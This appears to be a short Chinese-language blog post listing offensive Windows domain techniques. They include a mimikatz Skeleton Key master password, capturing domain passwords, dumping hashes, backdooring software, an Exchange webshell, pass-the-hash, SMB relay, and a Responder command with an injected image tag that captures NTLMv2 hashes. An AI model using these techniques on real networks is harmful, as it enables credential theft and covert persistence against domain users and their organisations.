- mimikatz Skeleton Key SSP Skeleton Key被安装在64位的域控服务器上,支持Windows Server2003—Windows Server2012 R2,能够让所有域用户使用同一个万能密码进行登录现有的所有域用户使用原密码仍能继续登录,重启后失效,使用mimikatz就可以安装。
- 记录域控密码 https://gist.github.com/mubix/6514311#file-evilpassfilter-cpp
- dump 域内所有hash
- 常用软件插后门 https://github.com/secretsquirrel/the-backdoor-factory
- cobalt-strike-persistence https://github.com/Tom4t0/cobalt-strike-persistence
- EXCHANGE服务器留webshell
- 控制一些vpn账号
- dump dns解析记录 dump ldap信息
工作组渗透
- 常规内网渗透
- 日服务
- pass the hash
各种欺骗攻击
https://github.com/SpiderLabs/Responder 撸下内网一个网站挂上<img src=\\xxx\\xx>
然后执行下面命令,就可以抓取ntlmv2 hash
./Responder.py -I eth0 -rPv
SMBRelay Attack
impacket
cobaltstrike工具免杀
cobaltstrike+veil
感谢您的来访,获取更多精彩文章请收藏本站。
© 版权声明
THE END
暂无评论内容